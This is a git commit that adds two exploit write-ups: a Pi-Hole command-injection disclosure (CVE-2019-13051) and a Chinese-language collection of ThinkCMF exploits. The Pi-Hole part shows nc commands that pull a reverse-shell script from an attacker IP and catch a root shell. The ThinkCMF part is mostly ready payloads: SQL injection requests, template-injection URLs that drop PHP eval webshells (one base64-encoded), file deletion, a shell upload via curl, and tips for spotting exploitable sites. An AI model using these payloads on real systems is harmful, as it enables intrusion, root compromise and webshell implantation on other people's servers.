add ThinkCMF漏洞全集和

2025-06-22 02:40:31 +00:00 · 2019-10-24 22:15:28 +08:00 · 2019-10-24 22:15:28 +08:00 · e7875347bf
commit e7875347bf
parent 8462934147
7 changed files with 205 additions and 0 deletions
--- a/CVE-2019-13051/README.md
+++ b/CVE-2019-13051/README.md
@ -0,0 +1,68 @@
 ## Pi-Hole < 4.3.2 Command Injection & PrivEsc (CVE-2019-13051)
 *Pi-Hole version 4.3.2 contains a patch to this vulnerability: https://github.com/pi-hole/AdminLTE/pull/974*
 A big thanks to the Pi-Hole dev team for their awesome project and for making it so easy to report this vulnerability!
 ### Executive Summary
 It is possible to remotely gain root access on the RaspberyPi device (or whichever device/VM the application is running on) through the described vulnerabilities on the "AdminLTE" component. Administrative access/credentials to the AdminLTE web interface is required in order to exploit this. 
 In more detail, it is possible to bypass regular expression checks and pollute the "Administrator E-mail Address" field with arbitrary command(s). These are in turn stored in "/etc/pihole/setupVars.conf" which are then subsequently parsed and executed with **root** privileges from the 10 minute cron.d job “/usr/local/bin/pihole updatechecker local”.
 ### Attack Pre-requisites 
 1) Network connectivity to the Administrative Pi-Hole web-application (AdminLTE). 
 2) Set of credentials for the AdminLTE web-application.
 ### Limitations
 An attacker has to wait for the 10minute interval of the cron job "/etc/cron.d/pihole" for command/code execution.
 ### Technical Description
 Hopefully the following details and PoC will help with your validation & reproduction of the issue.
 Once authenticated to the web-application there are a few server-side validations which an attacker needs to bypass to successfully inject a command.
 On "savesettings.php" L:499 a user-controlled variable "$adminemail" is evaluated against the FILTER_VALIDATE_EMAIL internal PHP function which checks are relatively weak. 
 It is then possible to bypass this validation check and prove command injection by simply enclosing a set of back ticks in double-quotes for example, entering the following as the administrator's e-mail:
 ``"`test>/tmp/poc_proof.txt`"@example.com``
 ![Screenshot 1](image001.png?raw=true)
 Within 10 minutes a root owned file containing "test" will be created within "/tmp/poc_proof.txt" with root privileges.
 ![Screenshot 2](image003.jpg?raw=true)
 In order to perform any further meaningful attacks one also needs to bypass the limitation of whitespaces (which aren't valid e-mail characters and are being caught by FILTER_VALIDATE_EMAIL function). For this, the internal linux variable ${IFS} was utilised (which defaults to whitespace in most unix os's).
 **PoC:**
 *Note: this could be automated with a 1-liner using POSIX shell grammar i.e. &&, || ... 
 1. Ensure you have your script delivery mechanism ready on your attacking machine. I.e. On the attacking machine:
 `nc -nvlp 4444 < revshell.py`
 2. Submit 1st command within "Administrator E-mail Address" field to trigger retrieval and storage of a reverse shell python script in "/tmp/revshell.py":
 ``"`nc${IFS}192.168.1.69${IFS}4444>/tmp/revshell.py`"@example.com``
 ![Screenshot 3](image005.png?raw=true)
 The HTTP request will look like this when examined with an HTTP proxy:
 ![Screenshot 4](image007.png?raw=true)
 Wait 10 minutes for the cron  job to run and grab the script or for reproduction purposes manually run `/usr/local/bin/pihole updatechecker local`. You can also validate the injected command residing in "/etc/pihole/setupVars.conf" (found assigned to the ADMIN_EMAIL variable)
 3. Ensure you have your shell catch service ready. I.e. on the attacking machine:
 `nc -nvlp 4445`
 4. Finally, you can submit the following:
 ``“`python${IFS}/tmp/revshell.py`”@example.com``
 Once again wait for 10 minutes (or execute cron script manually for issue reproduction purposes) and you will retrieve a root shell on your attacking machine. 
 ![Screenshot 1](image009.jpg?raw=true)
--- a/CVE-2019-13051/image001.png
+++ b/CVE-2019-13051/image001.png
--- a/CVE-2019-13051/image003.jpg
+++ b/CVE-2019-13051/image003.jpg
--- a/CVE-2019-13051/image005.png
+++ b/CVE-2019-13051/image005.png
--- a/CVE-2019-13051/image007.png
+++ b/CVE-2019-13051/image007.png
--- a/CVE-2019-13051/image009.jpg
+++ b/CVE-2019-13051/image009.jpg
--- a/ThinkCMF漏洞全集和.md
+++ b/ThinkCMF漏洞全集和.md
@ -0,0 +1,137 @@
 ## ThinkCMF漏洞全集和  
 > ...持续收集,欢迎贡献  
 - 前台SQL注入:  
 > 需要普通用户权限，默认可注册  
 > paylaod:  
 ```raw
 POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1
 Host: localhost
 Connection: close
 Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 79
 post[id][0]=bind&post[id][1]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)--+-
 ```
 > 还有以下可以测试：  
 ```raw
 post:
 term:123
 post[post_title]:123
 post[post_title]:aaa
 post_title:123
 post[id][0]:bind
 ```
 - 前台模版注入漏洞-可getshell四处  
 ```raw
 # 仅在Windows环境测试
 # 第一处  
 http://website/ThinkCMFX/index.php?g=Comment&m=Widget&a=fetch&templateFile=/../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($_POST[_])%3b');?>&prefix=
 # 第二处  
 http://website/ThinkCMFX/index.php?g=Api&m=Plugin&a=fetch&templateFile=/../../../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($_POST[_])%3b');?>&prefix=
 # 第三处  
 /index.php?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
 # 第四处
 /index.php?a=fetch&content=<?php+file_put_contents("mrxn.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbIjAwMCJdKTs/Pg=="));
 ```
 - 任意文件删除-只能windows删除  
 > 在用户上传头像处存在任意文件删除漏洞，发送如下数据包后，会删除网站根目录下一个名为 test.txt 的文件。（该漏洞仅能在 Windows 下触发）  
 ```
 POST /ThinkCMFX/index.php?g=User&m=Profile&a=do_avatar& HTTP/1.1
 Host: localhost
 Cookie: PHPSESSID=bggit7phrb1dl99pcb2lagbmq0;
 Connection: close
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 27
 imgurl=..\..\..\test.txt
 ```
 - 任意文件上传  
 > 在 ThinkCMFX2.2.3 最终版中，存在一处任意文件上传（需要普通用户权限，默认可注册）  
 ` curl -F "file=@/tmp/shell.php" -X "POST" -b 'PHPSESSID=qekmttucmue6vv41kpdjghnkd0;' 'http://127.0.0.1/ThinkCMFX/index.php?g=Asset&m=Ueditor&a=upload&action=uploadfile'
 `
 - 任意文件包含（读取数据库配置等等）  
 `/index.php?a=display&templateFile=README.md`
 ### 使用说明  
 > thinkcmf 并没有死，并且有3版本与5版本这里提供一些方法，帮助你们辨别哪一些是可以日的，那一些事不行的。
 1.看logo 3的logo是黄色的.
 2.在网站url 后面输入 admin,如果页面是蓝色的表示是3的，可日穿之.
 3.查看 README.md 在网站url后面输入README.md.
 > 另外还有一个说明，你在实际操作的过程中，可能会遇到他一直报这个`模板不存在`错:
 ```raw
 url:http://thinkcmf.test/index.php?g=Comment&m=Widget&a=fetch
 post:
 templateFile=/../public/index
 prefix=''
 content=<php>file_put_contents('test.php','<?php eval($_REQUEST[11]);')</php>
 ```
 请放心这并不是说明漏洞不可使用，而是说，这个模版不存在，你可以换一个html即可
 ```
 例如：
 /../public/index
 /../public/exception
 /../data/index
 /../data/runtime/index
 /../plugins/Mobileverify/View/admin_index
 /../plugins/Mobileverify/View/index
 /../plugins/Mobileverify/View/widget
 /../plugins/Demo/View/admin_index
 /../plugins/Demo/View/index
 /../plugins/Demo/View/widget
 /../application/Install/View/Public/footer
 /../application/Install/View/Public/head
 /../application/Install/View/Public/header
 /../application/Common/index
 /../application/Portal/Lang/en-us/index
 /../application/Api/Lang/en-us/index
 /../application/Api/Lang/zh-cn/index
 /../application/Comment/Lang/en-us/index
 /../application/Comment/Lang/zh-cn/index
 ```
 ```
 url:http://thinkcmf.test/index.php?g=Api&m=Plugin&a=fetch
 post:
 templateFile=/../../../public/index
 prefix=''
 content=<php>file_put_contents('test1.php','<?php eval($_REQUEST[11]);')</php>
 ```
 ```
 /../../../public/index
 /../../../public/exception
 /../../../data/index
 /../../../data/runtime/index
 /../../../plugins/Mobileverify/View/admin_index
 /../../../plugins/Mobileverify/View/index
 /../../../plugins/Mobileverify/View/widget
 /../../../plugins/Demo/View/admin_index
 /../../../plugins/Demo/View/index
 /../../../plugins/Demo/View/widget
 /../../../application/Install/View/Public/footer
 /../../../application/Install/View/Public/head
 /../../../application/Install/View/Public/header
 /../../../application/Common/index
 /../../../application/Portal/Lang/en-us/index
 /../../../application/Api/Lang/en-us/index
 /../../../application/Api/Lang/zh-cn/index
 /../../../application/Comment/Lang/en-us/index
 /../../../application/Comment/Lang/zh-cn/index
 ```
 > 还有最后一句废话：模版注入对于linux 并不好用 : )  
 参考：  
 https://xz.aliyun.com/t/3409
 https://xz.aliyun.com/t/3529 
 https://mochazz.github.io/2019/07/25/ThinkCMFX%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%90%88%E9%9B%86/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0